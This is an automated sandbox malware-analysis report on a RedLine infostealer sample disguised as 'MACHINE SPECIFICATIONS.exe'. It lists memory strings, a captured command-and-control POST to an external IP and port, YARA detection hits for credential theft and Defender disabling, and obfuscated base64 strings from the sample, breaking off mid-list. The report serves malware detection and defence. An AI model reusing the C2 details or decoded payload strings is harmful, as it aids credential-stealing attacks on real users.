                        Source: tmpD3.tmp.1.dr, tmp396.tmp.1.dr, tmp6B6.tmp.1.dr, tmp5EA.tmp.1.dr, tmp51E.tmp.1.dr, tmpFF0D.tmp.1.dr, tmp452.tmp.1.dr, tmp1CE.tmp.1.dr, tmp744.tmp.1.dr, tmp8DB.tmp.1.dr, tmp7DDD.tmp.1.dr, tmp29B.tmp.1.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://get.adob
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://helpx.ad
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280605622.000000000448B000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000000.00000002.280657393.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.364558379.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000000.257898395.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                        Source: tmpD3.tmp.1.dr, tmp396.tmp.1.dr, tmp6B6.tmp.1.dr, tmp5EA.tmp.1.dr, tmp51E.tmp.1.dr, tmpFF0D.tmp.1.dr, tmp452.tmp.1.dr, tmp1CE.tmp.1.dr, tmp744.tmp.1.dr, tmp8DB.tmp.1.dr, tmp7DDD.tmp.1.dr, tmp29B.tmp.1.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                        Source: tmpD3.tmp.1.dr, tmp396.tmp.1.dr, tmp6B6.tmp.1.dr, tmp5EA.tmp.1.dr, tmp51E.tmp.1.dr, tmpFF0D.tmp.1.dr, tmp452.tmp.1.dr, tmp1CE.tmp.1.dr, tmp744.tmp.1.dr, tmp8DB.tmp.1.dr, tmp7DDD.tmp.1.dr, tmp29B.tmp.1.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_java
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_real
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
                        Source: tmpD3.tmp.1.dr, tmp396.tmp.1.dr, tmp6B6.tmp.1.dr, tmp5EA.tmp.1.dr, tmp51E.tmp.1.dr, tmpFF0D.tmp.1.dr, tmp452.tmp.1.dr, tmp1CE.tmp.1.dr, tmp744.tmp.1.dr, tmp8DB.tmp.1.dr, tmp7DDD.tmp.1.dr, tmp29B.tmp.1.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                        Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.90:17910Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                        Source: unknownDNS traffic detected: queries for: api.ip.sb

                        System Summary

                        barindex
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 0.2.MACHINE SPECIFICATIONS.exe.448b6a8.5.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 0.2.MACHINE SPECIFICATIONS.exe.446b688.4.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 1.2.MACHINE SPECIFICATIONS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 0.2.MACHINE SPECIFICATIONS.exe.446b688.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 0.2.MACHINE SPECIFICATIONS.exe.44464d8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
                        Source: 0.2.MACHINE SPECIFICATIONS.exe.44464d8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
                        Source: 0.2.MACHINE SPECIFICATIONS.exe.44464d8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 0.2.MACHINE SPECIFICATIONS.exe.448b6a8.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 0.2.MACHINE SPECIFICATIONS.exe.448b6a8.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 0.2.MACHINE SPECIFICATIONS.exe.446b688.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 1.2.MACHINE SPECIFICATIONS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 0.2.MACHINE SPECIFICATIONS.exe.446b688.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 0.2.MACHINE SPECIFICATIONS.exe.44464d8.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
                        Source: 0.2.MACHINE SPECIFICATIONS.exe.44464d8.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
                        Source: 0.2.MACHINE SPECIFICATIONS.exe.44464d8.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 0.2.MACHINE SPECIFICATIONS.exe.448b6a8.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00D971800_2_00D97180
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00D904980_2_00D90498
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00D995580_2_00D99558
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00D9D6680_2_00D9D668
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00D99A500_2_00D99A50
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00D95BB80_2_00D95BB8
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00D92CF00_2_00D92CF0
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00D91E280_2_00D91E28
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00D9F4700_2_00D9F470
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00D995480_2_00D99548
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00D9DB080_2_00D9DB08
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00F402B80_2_00F402B8
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00F43BA70_2_00F43BA7
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00F41C000_2_00F41C00
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00F44D700_2_00F44D70
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00F40EA80_2_00F40EA8
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00F458480_2_00F45848
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 1_2_016FDE101_2_016FDE10
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 1_2_016FD2F01_2_016FD2F0
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 1_2_058021D81_2_058021D8
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 1_2_058068F81_2_058068F8
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 1_2_05801D981_2_05801D98
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 1_2_0580BE801_2_0580BE80
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 1_2_058026101_2_05802610
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 1_2_058001901_2_05800190
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.274192396.0000000002D7B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLDRj Axo.exe2 vs MACHINE SPECIFICATIONS.exe
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000000.241508449.000000000108E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNuGet.Frameworks.dll, vs MACHINE SPECIFICATIONS.exe
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280354476.0000000003BA1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameZakrytyeKupla.exe< vs MACHINE SPECIFICATIONS.exe
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280605622.000000000448B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLDRj Axo.exe2 vs MACHINE SPECIFICATIONS.exe
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLDRj Axo.exe2 vs MACHINE SPECIFICATIONS.exe
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000000.255245211.000000000108E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNuGet.Frameworks.dll, vs MACHINE SPECIFICATIONS.exe
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.364558379.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLDRj Axo.exe2 vs MACHINE SPECIFICATIONS.exe
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365714894.00000000033E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs MACHINE SPECIFICATIONS.exe
                        Source: MACHINE SPECIFICATIONS.exeBinary or memory string: OriginalFilenameNuGet.Frameworks.dll, vs MACHINE SPECIFICATIONS.exe
                        Source: MACHINE SPECIFICATIONS.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: MACHINE SPECIFICATIONS.exeVirustotal: Detection: 19%
                        Source: MACHINE SPECIFICATIONS.exeReversingLabs: Detection: 14%
                        Source: MACHINE SPECIFICATIONS.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe "C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe"
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess created: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess created: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MACHINE SPECIFICATIONS.exe.logJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeFile created: C:\Users\user\AppData\Local\Temp\tmpA1DA.tmpJump to behavior
                        Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@4/27@2/1
                        Source: MACHINE SPECIFICATIONS.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                        Source: MACHINE SPECIFICATIONS.exe, E6ou21sp/mtEC31vu.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: MACHINE SPECIFICATIONS.exe, E6ou21sp/p34sqIEC.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: MACHINE SPECIFICATIONS.exe, E6ou21sp/uHFmWqpG.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: MACHINE SPECIFICATIONS.exe, E6ou21sp/u0039u7HvIWG.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: MACHINE SPECIFICATIONS.exe, E6ou21sp/D5Gq3JZC.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: MACHINE SPECIFICATIONS.exe, E6ou21sp/y78voWXF.csBase64 encoded string: 'SW9hbHZ3Y2R8KVhMTi14bnxkdzNxe2Jyanx+Nzxwa2xUAUBGBBULFR0cCw=='
                        Source: MACHINE SPECIFICATIONS.exe, E6ou21sp/rKssIt3o.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: MACHINE SPECIFICATIONS.exe, E6ou21sp/omA5CsZE.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: MACHINE SPECIFICATIONS.exe, E6ou21sp/v9AX5C4E.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: MACHINE SPECIFICATIONS.exe, E6ou21sp/uA1ItnCm.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: MACHINE SPECIFICATIONS.exe, E6ou21sp/AC5KZsZF.csBase64 encoded string: 'SW9hbHZ3Y2R8KVhMTi14bnxkdzNxe2Jyanx+Nzxwa2xUAUBGBBULFR0cCw==', 'VGlnI21oZ2BtKX1iYGEubXUxYXtmfHh8fX06eWU9bHpNTlRKSkIGV0FRT0dfDVlGRFkSQERQVV5eUF9fHF5RUy8zYiU2KitnIT1tOGwvIT00NCAgeg=='
                        Source: MACHINE SPECIFICATIONS.exe, E6ou21sp/u0033Cv8rtWX.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: MACHINE SPECIFICATIONS.exe, E6ou21sp/vmpGX47v.csBase64 encoded string: 'SWxjZGElfGhnZCpmeX56L3J0MnFxYWFyfXc6Kiw9f3FEARcTFAAGBg==', 'QW1uI1dwdndne35uaC1IYGJ8c2dnaTw5cml9IDYzdG9FRhkJCkdLVxMDBExFSxUFHkFcVA8fGENRXwEREklXWSY9CBMBAmZqaAMlIiI5bh84PiY8Myc3JzAwOXsZJS46EhURQyMXCRIYFUBFBh0JVFpfGAMREgo1NSlaVlwqFxHk7vXwpMfv8+Xo+vemo+zi4O3V2tK1u7fb9vfr6c777dbEguTWxNbPwcrZi+XD2srC0trS2tLTl/7WyNbdycKV7qarpbiViIDo5Oqbo7+6rrK9t/OasKKgt6ux+5uvv6+IiIGQmM/Il4aOlr+lq6jP3dGmkpOSk5PYsJeam5jeuWltZyNCanRqaX12ISJ5Z2krOzxnfXNwa1l1djtadHJ6UwEKCQoPD1sCBwA=', 'QW1uI1dwdndne35uaC1IYGJ8c2dnaTw5cml9IDYzdG9FRhkJCkdLVxMDBExFSxUFHkFcVA8fGENRXwEREklXWSY9CBMBAmZqaAMlIiI5bh84PiY8Myc3JzAwOXsZJS46EhURQyMXCRIYFUBFBh0JVFpfGAMREgo1NSlaVlwqFxHk7vXwpMfv8+Xo+vemo+zi4O3V2tK1u7fb9vfr6c777dbEguTWxNbPwcrZi+XD2srC0trS2tLTl/7WyNbdycKV7qarpbiViIDo5Oqbo7+6rrK9t/OasKKgt6ux+5uvv6+IiIGQmM/Il4aOlr+lq6jP3dGmkpOSk5PYsJeam5jeuWltZyNCanRqaX12ISJ5Z2krOzxnfXNwa1l1djtadHJ6UwEKCQoPD1sCBwA=', 'SWxjZGEldXNpfWN4eGRtfDB4YTN1Y3d+dHh4d3k9eHBSARAXBEdWVwh7bWkMRENOV1RBE1tbWk4Z', 'Q25ubHYlYG5kfW95ZWNpL3NwfDN2cDZ2aGl2cnl5PmtPARAXBEdWVwh7bWkMRENOV1RBE1tbWk4Z', 'RXRhb21hY2ZmKWlkYGJ8L3Z4fmdxZ395fzl5enI9fHoAQFJTSExDQwhdRQseGQ5NQEESYXN3Fl5VWF1eTx1RUSw4Yw==', 'Q2ljbWpganQob2NneGh8Zn52MnB1ezZ1fTl7a2xxd3pEAVZMBBcSB0pZWgt+amwPWVxTVFFGFlhWVUMa', 'QnNrZGxxaGJ7eipqaGd7fGR8d31gNWNkcXd9O1ROUj9DTk5MVgVVV0lKTwtFXg5ORlBbX1VXWlIYX1VJHA8KHyIxMmMWAgRnISQrLCk+biA+PSty', 'Q25sd3ZkdXMoaG5heX56YnV/ZjNhZn95fzlSSFA9fXBMTlADV1VHRE0JQ1gMTFhOWV1TUVhQFlFXSxoJCB1cTzBhEAQGZS8qKS4vOGwiICMpcA==', 'U2B2dnZkcm5nZypqaGd7fGR8d31gNWNkcXd9O1ROUj9DTk5MVgVVV0lKTwtFXg5ORlBbX1VXWlIYX1VJHA8KHyIxMmMWAgRnISQrLCk+biA+PSty', 'SFJOI2JsanNte2Nlay1nfDBwZHJ9eXd1dHw6fXNvPi0UAUBTVAV0YGoJQ0ZNSktcEF5cX00U', 'SHRnI2lqYm5uYG95LGR9L3Fnc3p4dHR7fTl8dG49LCsAQ1JTBHdhZQhAR0pLSF0PX19eShU=', 'U253cWdgJndhcW9nLGthfX1wZjN9ZjZ5d206aGltbnBSVUdHBEdfB1xBTwtKREJbVUMc', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl7dXg9LykAQ1JTBEJURlFaSUpASA5GXVBVVkcVUFhKGUpJU15bTDMoLCRlZR8oPWk5IyM4IitwNzshJyF2NDc3LD4uKX4rCARCCgkEAQJIHQVLCx8PFgMSEx8RVQMEERcdWzkbGBrj9fGuusL05vH66erg6KA=', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 